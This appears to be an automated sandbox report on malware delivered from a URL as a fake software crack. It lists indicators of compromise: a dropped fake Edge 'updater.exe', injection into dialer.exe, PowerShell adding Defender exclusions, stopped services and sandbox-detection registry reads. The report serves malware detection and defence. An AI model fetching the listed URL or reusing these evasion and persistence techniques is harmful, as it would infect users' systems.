hxxps://oxy[.]name/d/BlQh

Resubmissions

11-05-2024 08:43

240511-kmxw8acd37 10

10-05-2024 16:36

10-05-2024 16:36

10-05-2024 16:28

10-05-2024 16:04

10-05-2024 11:02

Analysis

max time kernel
306s
max time network
307s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 08:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://oxy.name/d/BlQh

Score

10^/10

evasion execution

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

Processes:

updater.exeupdater.exe

description	pid	process	target process
PID 4928 created 3488	4928	updater.exe	Explorer.EXE
PID 4928 created 3488	4928	updater.exe	Explorer.EXE
PID 4928 created 3488	4928	updater.exe	Explorer.EXE
PID 4928 created 3488	4928	updater.exe	Explorer.EXE
PID 4928 created 3488	4928	updater.exe	Explorer.EXE
PID 4928 created 3488	4928	updater.exe	Explorer.EXE
PID 3300 created 3488	3300	updater.exe	Explorer.EXE
PID 3300 created 3488	3300	updater.exe	Explorer.EXE
PID 3300 created 3488	3300	updater.exe	Explorer.EXE
PID 3300 created 3488	3300	updater.exe	Explorer.EXE
PID 3300 created 3488	3300	updater.exe	Explorer.EXE
PID 3300 created 3488	3300	updater.exe	Explorer.EXE
PID 3300 created 3488	3300	updater.exe	Explorer.EXE

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4304 powershell.exe
5252 powershell.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 3 IoCs

Processes:

cli_gui.exeupdater.exeupdater.exe

pid process

112 cli_gui.exe
4928 updater.exe
3300 updater.exe

pid	process
4304	powershell.exe
5252	powershell.exe

pid	process
112	cli_gui.exe
4928	updater.exe
3300	updater.exe

Drops file in System32 directory 9 IoCs

Processes:

svchost.exesvchost.exepowershell.exesvchost.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\MicrosoftEdge	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Eliware Crack.exe

pid process

4524 Eliware Crack.exe

pid	process
4524	Eliware Crack.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

updater.exeupdater.exe

description	pid	process	target process
PID 4928 set thread context of 3268	4928	updater.exe	dialer.exe
PID 3300 set thread context of 5932	3300	updater.exe	dialer.exe
PID 3300 set thread context of 5804	3300	updater.exe	dialer.exe
PID 3300 set thread context of 5612	3300	updater.exe	dialer.exe

Drops file in Program Files directory 2 IoCs

Processes:

updater.exeupdater.exe

description ioc process

File created C:\Program Files\Microsoft\Edge\updater.exe updater.exe
File created C:\Program Files\Google\Libs\WR64.sys updater.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3088 sc.exe
1644 sc.exe
2156 sc.exe
5608 sc.exe
5924 sc.exe
2148 sc.exe
2572 sc.exe
5772 sc.exe
5740 sc.exe
5716 sc.exe

description	ioc	process
File created	C:\Program Files\Microsoft\Edge\updater.exe	updater.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

pid	process
3088	sc.exe
1644	sc.exe
2156	sc.exe
5608	sc.exe
5924	sc.exe
2148	sc.exe
2572	sc.exe
5772	sc.exe
5740	sc.exe
5716	sc.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exetaskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\6e9fe9be_0	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\6e9fe9be_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001\|\\Device\\HarddiskVolume2\\Program Files\\Google\\Chrome\\Application\\chrome.exe%b{00000000-0000-0000-0000-000000000000}"	svchost.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exechrome.exeOfficeClickToRun.exesvchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe

Modifies registry class 40 IoCs

Processes:

Explorer.EXEchrome.exeRuntimeBroker.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).y = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).left = "187"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "987"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).x = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "248"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "848"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exetaskmgr.exeEliware Crack.exeupdater.exepowershell.exedialer.exepowershell.execli_gui.exe

pid	process
992	chrome.exe
992	chrome.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4524	Eliware Crack.exe
4524	Eliware Crack.exe
992	chrome.exe
992	chrome.exe
4928	updater.exe
4928	updater.exe
4304	powershell.exe
4304	powershell.exe
4304	powershell.exe
4928	updater.exe
4928	updater.exe
4928	updater.exe
4928	updater.exe
4928	updater.exe
4928	updater.exe
4928	updater.exe
4928	updater.exe
3268	dialer.exe
3268	dialer.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
4928	updater.exe
4928	updater.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
112	cli_gui.exe
112	cli_gui.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe
3268	dialer.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

Explorer.EXEtaskmgr.exe

pid process

3488 Explorer.EXE
744 taskmgr.exe

pid	process
3488	Explorer.EXE
744	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

Processes:

chrome.exe

pid	process
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
